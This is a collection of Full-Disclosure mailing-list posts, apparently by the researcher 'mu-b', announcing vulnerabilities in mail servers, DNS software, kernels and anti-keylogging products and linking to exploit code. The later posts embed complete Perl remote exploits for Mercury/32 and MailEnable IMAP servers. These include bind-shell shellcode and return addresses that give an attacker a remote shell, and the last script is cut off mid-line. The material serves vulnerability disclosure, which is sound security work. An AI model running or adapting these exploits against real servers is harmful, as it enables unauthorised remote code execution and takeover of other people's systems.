[Full-disclosure] Trusteer Rapport and anti-keylogging
All - It has been a few weeks now since I demonstrated the following at 44con (http://www.44con.com) and thus time to just dump the details here. The following are what can only be described as 'design flaws' in Trusteer Rapport's anti-keylogger protections, that is Rapport provides the functionality to decrypt keys to *everyone* along with the ability to 'switch-off' anti-keylogger protections all together. However, I should say that in the latter case, Trusteer aren't the only ones to provide such functionality, KeyScrambler does also. This is somewhat documented in the following post, http://www.digit-security.com/blog/?p=47 The following are for OSX *only*, but you can extend these to Windows trivially (the ioctl obfuscation layer is easily bypassed by using Trusteer's own code), http://.digit-security.com/files/exploits/rapport-switchoff.c - switches off anti-keylogger protections on OSX allowing your already existing keylogger to function correctly once again. http://.digit-security.com/files/exploits/rapport-listen.c - uses Trusteer's own functionality to 'decrypt' keys directly. -- mu-b (m...@digit-labs.org) Only a few people will follow the proof. Whoever does will spend the rest of his life convincing people it is correct. - Anonymous, P ?= NP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NovaStor NovaNet = 13.0 issues
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 All - many of the following were inexplicably fixed in the latest version (NovaBACKUP Network 13.0), but still, a 2.5 year run isn't too bad... http://digit-labs.org/files/exploits/novanet-own-lnx.c - - linux remote root = 12.0 http://digit-labs.org/files/exploits/novanet-read.c - - arbitrary remote dword read = 12.0 http://digit-labs.org/files/exploits/novanet-own.c - - Windows (no-DEP/NX, NovaNet 11.0) remote SYSTEM = 12.0 (messy, there is a cleaner version) They seemed to have missed the last one, so it still works on 13.0, but sadly the most useless :( http://digit-labs.org/files/exploits/novanet-dos.c - - null deref remote DoS = 13.0 - -- mu-b (m...@digit-labs.org) Only a few people will follow the proof. Whoever does will spend the rest of his life convincing people it is correct. - Anonymous, P ?= NP -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkvVhHoACgkQY0H9BP42EjyqLwCfR941RwSLqTuh3xE2jDx4fBm6 REUAn36dzHIwJzq+dmlkZNSACKlz7eOW =aSH0 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] un-SafeCentral
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 All - well, it would seem that SafeCentral (www.safecentral.com) really isn't all that safe! of course it is 'safe', that is secure, under the assumption that Authentium seem to behold that all malware coders are obviously idiots. Those that aren't idiots would not really find it all that hard to break.. http://www.digit-labs.org/files/otherstuff/unsafecentral/ - -- mu-b (m...@digit-labs.org) Only a few people will follow the proof. Whoever does will spend the rest of his life convincing people it is correct. - Anonymous, P ?= NP -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAktQsnYACgkQY0H9BP42Ejz5XgCgnBpM+LWtcVuIvg/nVRxZgMog f8EAnjVhReR3Xsik5yoQnwSLZuJZFazo =hVnZ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VMSA-2009-0013 VMware Fusion resolves two security issues
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 All - the first bug is self-explanatory, # Kernel denial of service vulnerability An integer overflow vulnerability in the vmx86 kernel extension allows for a denial of service by an unprivileged user. The vmx86 kext ioctl handler contains several integer overflows which lead to kernel heap corruptions. These are probably not exploitable, and I didn't try given the second bug, http://www.digit-labs.org/files/exploits/vmware-pop.c # Kernel code execution vulnerability An ioctl vulnerability in the vmx86 kernel extension allows for executing arbitrary code in the kernel context by an unprivileged user. The vmx86 kext ioctl handler permits an unprivileged userland program to initialize several function pointers via the 0x802E564A ioctl code. These function pointers are later used from several reachable locations within the driver, one of which is called immediately after initialization. http://www.digit-labs.org/files/exploits/vmware-fission.c - -- mu-b (m...@digit-labs.org) Only a few people will follow the proof. Whoever does will spend the rest of his life convincing people it is correct. - Anonymous, P ?= NP -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkrFvGUACgkQY0H9BP42EjxSCACdEzIXe0D8n+VVplyEsuCbPBKS TjAAnAnHUPOSKrphGeaynF5bIKYQNyPY =lMJv -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FreeBSD/OS X kernel bug dump
thanks to the person who bothered to let me know the links were *slighty* wrong, that is what you get trying to stay awake to beat jet-lag... Quoting m...@digit-labs.org: All - the following are the exploits from the recent demonstrations at Apple Mac OSX = 10.4.0 local kernel root http://www.digit-labs.org/files/exploits/xnu-hfs-fcntl-v2.c http://www.digit-labs.org/files/exploits/xnu-hfs-fcntl-v2.sh FreeBSD = 7.0 ktimer local kernel root (http://security.freebsd.org/advisories/FreeBSD-SA-09:06.ktimer.asc) http://www.digit-labs.org/files/exploits/bsd-ktimer.c other random stuff.. http://www.digit-labs.org/files/exploits/xnu-macfsstat-leak.c http://www.digit-labs.org/files/exploits/xnu-profil-leak.c http://www.digit-labs.org/files/exploits/xnu-appletalk-zip.c all the above are old now, but still exist today... christer/mu-b -- mu-b (m...@digit-labs.org) Only a few people will follow the proof. Whoever does will spend the rest of his life convincing people it is correct. - Anonymous, P ?= NP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FreeBSD/OS X kernel bug dump
All - the following are the exploits from the recent demonstrations at Apple Mac OSX = 10.4.0 local kernel root http://www.digit-labs.org/files/exploits/xnu-hfs-fcntl.c http://www.digit-labs.org/files/exploits/xnu-hfs-fcntl.sh FreeBSD = 7.0 ktimer local kernel root (http://security.freebsd.org/advisories/FreeBSD-SA-09:06.ktimer.asc) http://www.digit-labs.org/files/exploits/bsd-ktimer.c other random stuff.. http://www.digit-labs.org/files/exploits/xnu-macfsstat-leak.c http://www.digit-labs.org/files/exploits/xnu-profil-leak.c http://www.digit-labs.org/files/exploits/xnu-appletalk-zip.c all the above are old now, but still exist today... christer/mu-b -- mu-b (m...@digit-labs.org) Only a few people will follow the proof. Whoever does will spend the rest of his life convincing people it is correct. - Anonymous, P ?= NP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] eXtremail(ly easy) remote roots
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 The attached either exploit or demonstrate a rash of remotely exploitable bugs in eXtremail =2.1.1 which perhaps should be renamed to the more apt name of eXtremely-rootable-mail... of course, in the grand schema, these are more-or-less completely useless!.. *) extremail-v3.pl demonstrates two vulnerabilities, the first a denial of service caused by an integer underflow into the length argument of a call to memmove(). This is caused due to the author replacing every occurrence of %s with %%s (before logging the resulting string to a file, perhaps the author is still somewhat paranoid after the re-occurrence of older format string vulnerabilities :-)) whilst forgetting to take into account that the string actually gets longer by a single-byte after each replace!. The second bug is rather interesting and is either a failure in GCC points-to analysis or a consequence of the author neglecting the possibility that a temporary pointer to a heap buffer may have changed after a call to realloc (ifReservaMasMem) and refreshing the pointer to the heap buffer given as argument (which may have been free()'d). (I would tend to believe the later..) This results in the overwriting of potentially free'd memory with user-definable data (albeit very restricted). PoC: http://www.digit-labs.org/files/exploits/extremail-v3.pl *) extremail-v4.c - trivial remote stack-overflow in the admin interface. PoC: http://www.digit-labs.org/files/exploits/extremail-v4.c *) extremail-v5.c - remote heap overflow in CRAM-MD5 authentication. PoC: http://www.digit-labs.org/files/exploits/extremail-v5.c *) extremail-v6.c - trivial remote stack-overflow in PLAIN authentication. PoC: http://www.digit-labs.org/files/exploits/extremail-v6.c *) extremail-v7.c - THIS PAGE UNINTENTIONALLY LEFT BLANK (I appear to have misplaced it, but given that eXtremail is holier than the pope himself, I shouldn't think it would take too long to fill.) *) extremail-v8.pl demonstrates a remote heap overflow in the recv()-loop whereby the author has mistakenly assumed that the string length of all currently received data is at least equal to the sum of all return values from each call to recv(). (trivial contradiction follows if we send() the first buffer containing \x00). This causes an incorrect number of bytes to be reallocated and a remote heap overflow in a call to memcpy(). PoC: http://www.digit-labs.org/files/exploits/extremail-v8.pl - -- mu-b ([EMAIL PROTECTED]) Only a few people will follow the proof. Whoever does will spend the rest of his life convincing people it is correct. - Anonymous, P ?= NP -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.3 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHE0/EY0H9BP42EjwRCOMpAKDMa0qnZ3ZzDntbmwo505GjLUzcSACeIG00 3lsWit0K9ZIApcLXUg+CrgM= =LkOe -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SafeNET High Assurance Remote/SoftRemote (IPSecDrv.sys) remote DoS
Attached is POC for a remote DoS in IPSecDrv.sys shipped with SafeNET High Assurance Remote and SoftRemote. The version tested is 10.4.0.12. The bug itself is due to SafeNET making a complete hash of IPv6 support for IPSec. The result of the code is a complete DoS of the machine in Kernel mode whilst the driver proceeds to enter an infinite loop (apparently looking for a suitable IPSec extension header, which it will never find). The dodgy code can be found at offset 0x1000BEB0 of IPSecDrv.sys (10.4.0.12). The attached code will only work over local subnets, however this is trivially remote with IPv6. PoC: http://www.digit-labs.org/files/exploits/safenet-dos.c hmmm, I wonder how SafeNET think they can charge for such a half-baked, crufty, god-awful implementation -- mu-b ([EMAIL PROTECTED]) Only a few people will follow the proof. Whoever does will spend the rest of his life convincing people it is correct. - Anonymous, P ?= NP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] mydns-1.1.0 remote heap overflow
The attached PoC causes a remote heap smash in mydns 1.1.0, the bug is found within the dynamic update code (update.c). Exploitation requires update privs (which tends not to matter too much if you know an IP address with privileges to do so), also allow-update = yes must be set in /etc/mydns.conf. The attached patch also fixes a stack based off-by-one overflow in update.c. Example :- 0xb7f27410 in __kernel_vsyscall () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x0805d0e2 in ?? () (gdb) x/i $eip 0x805d0e2 [EMAIL PROTECTED]: rep movsb %ds:(%esi),%es:(%edi) PoC: http://www.digit-labs.org/files/exploits/mydns-rr-smash.c Patch: http://www.digit-labs.org/files/patches/mydns-update.c.diff -- mu-b ([EMAIL PROTECTED]) Only a few people will follow the proof. Whoever does will spend the rest of his life convincing people it is correct. - Anonymous, P ?= NP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] eXtremail-v9
The attached POC exploits a trivial stack smash in the DNS parsing code of eXtremail versions = 2.1.1 (current). The POC attached is rather trivial in that it simply answers queries with a suitable response (to exhibit the overflow). However, the problem is further compounded by the fact that eXtremail neglects to even verify the validity of the transaction id in any responses, and thus is trivially vulnerable to DNS spoofing attacks (I am *pretty* sure a more *inventive* method of exploitation exists to yield trivial remote root...). Program received signal SIGSEGV, Segmentation fault. 0xdeadbeef in ?? () (gdb) bt #0 0xdeadbeef in ?? () #1 0x3031002e in ?? () #2 0x3634 in ?? () #3 0x in ?? () (gdb) POC: http://www.digit-labs.org/files/exploits/extremail-v9.c -- mu-b ([EMAIL PROTECTED]) Only a few people will follow the proof. Whoever does will spend the rest of his life convincing people it is correct. - Anonymous, P ?= NP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] dproxy - arbitrary code execution through stack buffer overflow vulnerability
you might want to NULL terminate query_string while your there Alexander Klink wrote: ||| Security Advisory AKLINK-SA-2007-001 ||| ||| CVE-2007-1465 (CVE candidate)||| dproxy - remotely exploitable buffer overflow Date released: 20.03.2007 Date reported: 11.03.2007 $Revision: 1.1 $ by Alexander Klink Cynops GmbH [EMAIL PROTECTED] https://www.cynops.de/advisories/CVE-2007-1465.txt (S/MIME signed: https://www.cynops.de/advisories/CVE-2007-1465-signed.txt) https://www.klink.name/security/aklink-sa-2007-001-dproxy-bufferoverflow.txt http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1465 Vendor: Matthew Pratt (Open Source) Product: dproxy - a small caching DNS server Website: http://dproxy.sourceforge.net Vulnerability: buffer overflow Class: remote Status: unpatched (author is unresponsive) Severity: high (arbitrary command execution as root) Releases known to be affected: 0.1, 0.2, 0.3, 0.4, 0.5 Releases known NOT to be affected: dproxy-nexgen + Overview: dproxy suffers from a typical buffer overflow condition, which allows an attacker to overwrite the stack. + Technical details: In dproxy.c, the UDP packet buffer, which can be up to 4096 bytes long is copied into a variable called query_string, which is at most 2048 bytes. As this is done using strcpy, the stack can be overwritten which leads to arbitrary command execution. Note that one can easily find out whether dproxy is running using the fpdns tool (see http://www.rfc.se/fpdns/). dproxy also seems to be used in a number of WLAN access points / routers, but the version used there (at least in the Linksys WRT54AG, the Asus WL500g and the Netgear DG834G) seems to be dproxy-nexgen, which is not vulnerable to this attack. Thanks to Dan Kaminsky, who provided me with the interesting statistics that apparently only 20 out of about 2.000.000 DNS servers he scanned are using dproxy. So this does not look like a major attack vector. + Exploit: A MetaSploit Framework 2.7 exploit module is available from https://www.cynops.de/downloads/metasploit/dproxy.pm It has been tested successfully with both a Debian stable and an Ubuntu system (with randomize_va_space=0). + Workaround: Drop packets to the destination UDP port 53 which are larger than 2048 bytes (which is a pretty large DNS query packet anyway). + Communication: * 13.03.2007: Author updated on vulnerable versions * 11.03.2007: First problem report to author + Solution: Patch dproxy.c: --- dproxy-0.5/dproxy.c 2000-02-03 04:15:35.0 +0100 +++ dproxy-0.5.patched/dproxy.c 2007-03-13 13:07:53.0 +0100 @@ -105,7 +105,7 @@ /* child process only here */ signal(SIGCHLD, SIG_IGN); - strcpy( query_string, pkt.buf ); + strncpy( query_string, pkt.buf, sizeof(query_string) ); decode_domain_name( query_string ); debug(query: %s\n, query_string ); + Credits: Alexander Klink, Cynops GmbH (discovery and exploit development, patch) -- mu-b ([EMAIL PROTECTED]) Only a few people will follow the proof. Whoever does will spend the rest of his life convincing people it is correct. - Anonymous, P ?= NP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Mercur SP4 IMAPD
The attached exploits several signedness bugs in the NTLM implementation of Mercur IMAPD (www.atrium-software.com) to give the attacker complete control over a memcpy to a stack variable... (non-authenticated) In this case, memcpy(buf, src+a, b) with 'a', and 'b' being user controlled and buf ~7208 bytes. note due to the most important signedness issue, we can only control 'a' within the range -65535 a 65536... The result of the PoC is an simple crash trying to copy 0x bytes... (d94.1dc): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0210a108 ebx=0210ac24 ecx=3fffeb08 edx= esi=0211 edi=0210f4e4 eip=0042e0d3 esp=021098c8 ebp=021098d0 iopl=0 nv up ei pl nz na pe cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010207 *** WARNING: Unable to verify checksum for C:\Program Files\MERCUR\mcrimap4.exe *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MERCUR\mcrimap4.exe - mcrimap4!_GetExceptDLLinfo+0x2d05f: 0042e0d3 f3a5rep movs dword ptr es:[edi],dword ptr [esi] es:0023:0210f4e4= ds:0023:0211=??? PoC: http://www.digit-labs.org/files/exploits/mercur-v1.pl -- mu-b ([EMAIL PROTECTED]) Only a few people will follow the proof. Whoever does will spend the rest of his life convincing people it is correct. - Anonymous, P ?= NP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Mercury/32 4.01b
Attached is a remote exploit (disarmed PoC) for Mercury/32 4.01b IMAPD. The vulnerability is located in the call:- 034646AE callsub_346ECD9 which is passes (as third argument) the number of bytes remaining in a stack buffer in order to construct the complete command from the continuation data. However the calculation neglects to take into account the length of the previously supplied command (1 LOGIN 900 x '\x20' {255}). The result of the attached exploit is a DoS (given below), however, remote code execution is possible in at least two different ways without authentication... (b24.a70): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0456d70c ebx=41414141 ecx=7ffad000 edx=034a2970 esi=0500 edi= eip=00441d88 esp=0456d6dc ebp=0456d6ec iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010246 mercuryi!miconfig_proc_3+0xbacd: 0346ed48 8807mov byte ptr [edi],al ds:0023:0457=?? (note this may be the same as BID 21110). -- mu-b ([EMAIL PROTECTED]) Only a few people will follow the proof. Whoever does will spend the rest of his life convincing people it is correct. - Anonymous, P ?= NP #!/usr/bin/perl # # mercurypown-v1.pl # # Mercury/32 v4.01b (win32) remote exploit # by mu-b - 28 Nov 2006 # # - Tested on: Mercury/32 v4.01a (win32) # Mercury/32 v4.01b (win32) # # Stack-based buffer overflow caused by Mercury/32 concatenating # continuation data into a fixed sized buffer disregarding # the length of the original command, you do not require authentication. # # This is a little harder to exploit than usual since the # stack frame in question calls end_thread before returning.. # buts it's still possible by at *least* two different ways... # (i.e. controlling a pointer into sprintf and/or controlling # a pointer to be free()). # use Getopt::Std; getopts('t:n:', \%arg); use Socket; print_header; my $target; if (defined($arg{'t'})) { $target = $arg{'t'} } if (!(defined($target))) { usage; } my $imapd_port = 143; my $send_delay = 1; my $NOP = 'A'; my $LEN = 9200;#8928; my $BUFLEN = 8192; if (connect_host($target, $imapd_port)) { print(- * Connected\n); $buf = 1 LOGIN.( x($LEN-$BUFLEN)).\{255\}\n; send(SOCKET, $buf, 0); sleep($send_delay); print(- * Sending payload\n); $buf = $NOP x 255; send(SOCKET, $buf, 0); sleep($send_delay); print(- * Sending payload 2\n); $buf = $NOP x $BUFLEN; send(SOCKET, $buf, 0); sleep($send_delay); print(- * Successfully sent payload!\n); } sub print_header { print(Mercury/32 v4.01b (win32) remote exploit\n); print(by: [EMAIL PROTECTED]\n\n); } sub usage { print(qq(Usage: $0 -t hostname -t hostname: hostname to test )); exit(1); } sub connect_host { ($target, $port) = @_; $iaddr = inet_aton($target) || die(Error: $!\n); $paddr = sockaddr_in($port, $iaddr) || die(Error: $!\n); $proto = getprotobyname('tcp') || die(Error: $!\n); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(Error: $!\n); connect(SOCKET, $paddr) || die(Error: $!\n); return(1337); } ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MailEnable v2.37 APPEND exploit
Attached is another exploit for the MailEnable Pro/Ent = 2.37 (including the latest). The vulnerability is a bog-standard stack based overflow in the call at offset 0x00417CD6 (MEIMAPS.exe, v2.37). --- ([EMAIL PROTECTED]) #!/usr/bin/perl # # maildisable-v4.pl # # Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit # by mu-b - Wed Nov 29 2006 # # - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX # Mail Enable Professional v2.33 (win32) # Mail Enable Professional v2.35 (win32) # Mail Enable Professional v2.37 (win32) # use Getopt::Std; getopts('t:n:u:p:', \%arg); use Socket; # Fixed metasploit win32 bindshell port 1337 my $zshell_win32_bind = \x33\xc9\x83\xe9\xb0. \x81\xc4\xd0\xfd\xff\xff. # add %esp, -560 \xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d. \xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96. \xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2. \x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0. \xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41. \x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82. \x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2. \x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39. \xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9. \x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b. \x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a. \x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88. \x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01. \xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20. \x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e. \xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39. \x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44. \xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96. \x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38. \xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9. \x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09. \x4e\x33\xe4\x96\xcd\xcc\x32\x69; # ff e4 - jmp %esp my @offsets = ( \x63\x37\x57\x7c, # Win2K Server SP4 KERNEL32.dll \x38\x07\xd2\x77, \xef\xbe\xad\xde # DoS ); print_header; my $target; my $offset; my $user; my $passwd; if (defined($arg{'t'})) { $target = $arg{'t'} } if (defined($arg{'n'})) { $offset = $arg{'n'} } if (defined($arg{'u'})) { $user = $arg{'u'} } if (defined($arg{'p'})) { $passwd = $arg{'p'} } if (!(defined($target)) || !(defined($user)) || !(defined($passwd))) { usage; } if (!(defined($offset))) { $offset = 0; } if ($offset $#offsets) { print(only .($#offsets+1). targets known!!\n); exit(1); } else { $offset = $offsets[$offset]; } my $imapd_port = 143; my $send_delay = 2; my $NOP = 'A'; if (connect_host($target, $imapd_port)) { print(- * Connected\n); send(SOCKET, 1 LOGIN .$user. .$passwd.\r\n, 0); sleep($send_delay); print(- * Sending payload\n); $buf = 2 APPEND \()\\{. ($NOP x 128). \xef\xbe\xad\xde. $offset. \x01\xa3\x19\x03. ($NOP x 8 ). $zshell_win32_bind. \}\r\n; send(SOCKET, $buf, 0); sleep($send_delay); print(- * Successfully sent payload!\n); print(- * nc .$target. 1337 for shell...\n); } sub print_header { print(MailEnable Pro v2.32-7 remote exploit\n); print(by: [EMAIL PROTECTED]\n\n); } sub usage { print(qq(Usage: $0 -t hostname -t hostname: hostname to test -n num : return addy offset number -u username: username for login -p password: usernames password )); exit(1); } sub connect_host { ($target, $port) = @_; $iaddr = inet_aton($target) || die(Error: $!\n); $paddr = sockaddr_in($port, $iaddr) || die(Error: $!\n); $proto = getprotobyname('tcp') || die(Error: $!\n); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(Error: $!\n); connect(SOCKET, $paddr) || die(Error: $!\n); return(1338); } ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] More MailEnable exploits..
The following should somewhat specify any mention of unspecified in the following BID's, patched as some idiots cannot resist trying to own mailenable.com... BID: 21252 (maildisable-v3.pl) BID: 21492 (maildisable-v6.pl) --- ([EMAIL PROTECTED]) #!/usr/bin/perl # # maildisable-v3.pl # # Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit # by mu-b - Thu Nov 23 2006 # # - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX # Mail Enable Professional v2.33 (win32) # Mail Enable Professional v2.34 (win32) # # what does this remind you off? # Note: timing is quite critical with this!!, so change $send_delay # if it doesn't work # use Getopt::Std; getopts('t:n:', \%arg); use Socket; # metasploit win32 bindshell port 1337 my $zshell_win32_bind = \x33\xc9\x83\xe9\xb0. \x81\xc4\xd0\xfd\xff\xff. \xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d. \xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96. \xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2. \x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0. \xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41. \x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82. \x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2. \x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39. \xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9. \x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b. \x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a. \x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88. \x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01. \xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20. \x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e. \xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39. \x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44. \xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96. \x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38. \xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9. \x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09. \x4e\x33\xe4\x96\xcd\xcc\x32\x69; # ff e4 - jmp %esp my @offsets = ( \xf8\xfe\x5a\x7c, # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099 \xe2\x48\xe6\x77, # WinXP SP0 KERNEL32.dll 5.1.2600.0 \x06\x38\xe6\x77, # WinXP SP1 KERNEL32.dll 5.1.2600.11061 \xd9\xae\x80\x7c, # WinXP SP2 KERNEL32.dll 5.1.2600.21802 \x62\x51\xeb\x77, # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300 \xef\xbe\xad\xde # DoS ); print_header; my $target; my $offset; if (defined($arg{'t'})) { $target = $arg{'t'} } if (defined($arg{'n'})) { $offset = $arg{'n'} } if (!(defined($target))) { usage; } if (!(defined($offset))) { $offset = 0; } if ($offset $#offsets) { print(only .($#offsets+1). targets known!!\n); exit(1); } else { $offset = $offsets[$offset]; } my $imapd_port = 143; my $send_delay = 2; my $NOP = 'A'; my $START_PAD = 3; if (connect_host($target, $imapd_port)) { print(- * Connected\n); send(SOCKET, 1 LOGIN {1022}\r\n, 0); sleep(2); print(- * Sending padding payload\n); # first recv 0x3fe, NULL tricks strncpy... send(SOCKET, \x00.($NOP x 1020), 0); sleep($send_delay); print(- * Sending payload\n); $buf = ($NOP x $START_PAD).# padding \xee\xaf\xdc\xba. # dummy var_0 \xef\xbe\xad\xde. # EBP $offset.# EIP \xdc\xa3\x19\x03. # dummy arg_0 \xdc\xa3\x19\x03 v2.33 ($NOP x 4). # NOPS $zshell_win32_bind. # hellcode $NOP x (0x3fd-$START_PAD-16-length($zshell_win32_bind)-5); send(SOCKET, $buf, 0); sleep($send_delay); print(- * Successfully sent payload!\n); print(- * nc .$target. 1337 for shell...\n); } sub print_header { print(MailEnable Pro v2.32-4 (HOTFIX) remote exploit\n); print(by: [EMAIL PROTECTED]\n\n); } sub usage { print(qq(Usage: $0 -t hostname -t hostname: hostname to test -n num : return addy offset number )); exit(1); } sub connect_host { ($target, $port) = @_; $iaddr = inet_aton($target) || 